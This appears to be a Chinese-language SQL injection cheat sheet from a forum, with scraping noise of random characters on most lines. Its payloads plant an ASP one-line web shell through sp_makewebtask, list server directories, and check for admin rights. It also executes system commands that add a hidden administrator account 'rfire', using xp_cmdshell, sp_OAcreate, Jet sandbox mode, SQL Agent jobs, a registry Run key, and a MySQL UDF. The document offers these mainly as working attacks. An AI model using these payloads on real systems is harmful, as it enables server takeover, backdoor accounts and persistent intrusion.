MSSQL语句导出一句话木马
/ c- ]6 P: @( i* x) Y, Z首先确定网站的WEB路径
: e7 r! N. e0 J' R;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 c; A# T& q& m! `! g! B
- C, U! [# m9 ^;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- - L+ m5 l; ?$ g0 a' H2 c8 Q1 u" \5 j) ]
//将一句话木马插入表中' Q) k8 C0 \9 N7 E8 ?) C
; i' [6 y2 w# }, r$ B* V;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
' s; X# ?4 I. W//导出一个ASP文件
4 s; g. r/ z. n7 L& M5 \; t+ _- c5 j3 E8 @0 F' e
* n* f/ Q6 I1 R5 R6 E# z
关于MSSQL列目录
) G5 b: @, \9 ~;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表$ A- ?! a8 e1 b0 c. W: Z1 O4 s' g
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
7 R7 x, l5 `7 s) W3 U4 Z" u" |, n4 x& Z3 i+ j
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录* b+ q; e3 f. d: w6 c5 g" F$ g
- i' u; K0 R/ H
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段# h2 y1 |2 k: D0 K) r% ^$ s" q
1 w, _& p9 X* i( P' a% ]0 v& ~3 U" dAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
% r6 L+ Y8 t! ^6 Z" T7 ^% n2 v- U5 P
6 Y; h. j( {! m- @5 Q% W, N9 o7 Q数据库版本和权限查看! i: X) k1 Q. S* n" c& ~/ a
and 1=(select @@VERSION) //查看详细的数据库信息.
9 d. Z. L( H7 [& E# Z7 Jand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
9 [/ v$ l; |+ D. _$ q! w, V3 ?; band 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER$ M0 s; k8 e5 r6 G
0 f, y e4 Z! H6 o) z; n) |. ~/ M
1 s. r. N( O- M! `$ ]( ?1.利用xp_cmdshell执行命令
+ N7 w+ ?) T6 |* n+ fexec master..xp_cmdshell 'net user rfire 123456 /add'$ e u' x. m6 Q- t
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
/ a/ S( W- W* [( n1 q9 J( I5 j
% P' F' u3 U, B- C恢复xp_cmdshell存储过程
. X+ O# H+ Y+ G/ L0 P, ~Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 R8 g; `' C9 J, a% G
8 |, [8 P# S$ t' V5 C- j8 ^1 x! C5 I `6 P2 A! h- M
2.利用SP_OAcreate和SP_OAMETHOD执行命令
6 c5 `6 b! N1 W$ n在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
9 F* v6 x7 p2 b; i: XDECLARE @shell INT //建立一个@shell实体
8 }" C) J) A; W H+ pEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
, G8 |9 K! H1 }; j- J: NEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例; O4 B+ _ l* Y
9 d0 R N8 D, q ?+ D% J2 n
, d" ^. {" a2 M' X* t0 Q4 D5 D- G- f
3.利用沙盒模式
4 A( b! ~/ d$ V3 t. Q7 r0 v先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。+ W' S% I" I z9 u, |
开启沙盒模式:* ]8 j7 j' o0 y0 m. X! w
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0+ c) @1 c5 ^5 \( o- c1 i
9 p3 y# p1 C% I+ G
执行命令:4 Z! a" s$ M: ?' ^, I( w! E
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
8 P7 R4 D% D# A- }1 |9 I, d* @* Q9 t$ t# O1 D d+ u- u) m& L
% J: o: j: h1 \' W+ A% D) E; F
4.利用SQL代理执行命令
- T) {1 y7 B+ Q4 \; c F- wEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务4 C0 U. _$ d0 \) G) X" C
( M9 Z' Z7 p7 u. x; k: o0 F执行命令:
W( k2 Y% _; B8 r6 |( quse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
4 t: Q: S2 b6 j' i' b t9 T: i9 M; bexec sp_add_job 'x' c, H5 x x# w
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
]# J: r- h; Q5 P: e# y# G! kexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业 G" ?2 X& D: E
9 ?+ \9 m. E+ Z( v! ^( W5 m: l/ Y7 H/ n/ k7 m# Z
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
( Y2 |$ ^) P! a! N0 ]3 }( XEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
2 C5 p, P6 g1 \3 C
* s3 N: K2 ^1 Z9 F/ O9 U5 g
$ p ~6 X% t" c: {6.MYSQL的命令执行* z4 I/ m/ [3 ^" g0 w
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
" T# l: i0 a- O9 _首先要在su.php下导出c:\windows\udf.dll
% x* c3 f5 i9 [' [导出后执行创建自定义函数命令:
, p. l* I6 D8 C3 z( ICreate Function cmdshell returns string soname 'udf.dll'
; h5 h! p- B1 n. n执行命令
3 p- C% M+ U, T G5 V/ T- pselect cmdshell('net user rfire 123456 /add')) Y% `2 ]# {/ h, o
执行后删除函数 drop function cmdshell
9 K: V" r3 C$ I) k- Z |